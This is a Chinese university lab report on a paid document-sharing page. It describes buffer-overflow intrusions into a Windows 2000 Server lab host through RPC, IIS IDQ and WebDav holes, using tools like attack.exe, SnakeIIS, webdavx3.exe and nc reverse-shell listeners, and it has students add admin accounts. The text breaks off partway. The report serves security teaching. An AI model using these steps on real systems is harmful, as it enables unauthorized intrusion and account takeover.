实验报告四 缓冲区溢出攻击(安徽农业大学).pdfVIP

实验报告四 缓冲区溢出攻击(安徽农业大学).pdf

  1. 1、本文档共9页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多

实验报告四缓冲区溢出攻击(安徽农业大学)--第1页

实验四缓冲区溢出攻击

姓名:学号:班级:2班

实验组别:同组实验者姓名:

指导教师:章恒日期:成绩:

【实验报告要求】

1.简述缓冲区溢出攻击的基本原理。

2.利用RPC漏洞溢出入侵一台操作系统是Windows2000Server的计算机,写出基本步骤。

3.利用IIS溢出入侵一台操作系统是Windows2000Server的计算机,在该计算机上新增

用户test,密码为123456,并将test用户添加到管理员组,写出基本步骤。

4.利用WebDav远程溢出入侵一台操作系统是Windows2000Server的计算机,在该计算

机上新增用户hacker,密码为123456,并将hacker用户添加到管理员组,写出基本步

骤。

5.写出上述三种入侵方法的总结报告。

实验步骤与调试过程:1.RPC漏洞出。首先调用RPC(RemoteProcedureCall)。当

系统启动的时候,自动加载RPC服务。可以在服务列表中看到系统的RPC服务。利用

RPC漏洞建立超级用户。首先,把scanms.exe文件拷贝到C盘跟目录下,检查地址段

172.18.25.109到172.18.25.11。点击开始运行在运行中输入cmd确定。进入DOs模

式、在C盘根目录下输入scanms.exe172.18.25.109-172.18.25.110,回车。检查漏洞。

2.检查缓冲区溢出漏洞。利用工具软件attack.exe对172.18.25.109进行攻击。在进入

DOC模式、在C盘根目录下输入acctack.exe172.18.25.109,回车。

3.3,利用软件SnakeIIS溢出工具可以让对方的IIS溢出。进入IIS溢出工具软件的主界

面.IP:172.18.25.109PORT:80监听端口为813单击IDQ溢出。出现攻击成功地提示对

话框。

4.利用工具软件nc.exe连接到该端口。进入DOs模式,在C盘根目录下输入nc.exe-vv

172.18.25.109813回车。

5.监听本地端口(1)先利用nc.exe命令监听本地的813端口。进入DOs模式,在C

盘根目录下输入nc-l-p813回车。(2)这个窗口就这样一直保留,启动工具软件snake,

本地的IP地址是172.18.25.110,要攻击的计算机的IP地址是172.18.25.109,选择溢出

选项中的第一项,设置IP为本地IP地址,端口是813.点击按钮“IDQ溢出”。(3)查

看nc命令的DOS框,在该界面下,已经执行了设置的DOS命令。将对方计算机的C

盘根目录列出来,进入DOC模式,在C盘根目录下输入nc-l-p813回车。

6.利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。(1)在DOS

1

实验报告四缓冲区溢出攻击(安徽农业大学)--第1页

实验报告四缓冲区溢出攻击(安徽农业大学)--第2页

命令行下执行webdavx3.exe,进入DOC模式,在C盘根目录下输入webdavx3.exe

172.18.25.109回车。(2)nc.exe程序入侵对方的计算机进入DOC模式,在C盘根目录

下输入nc-vv172.18.25.1097788回车。

实验结果:

1.成功加载RP

文档评论(0)

175****9697 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档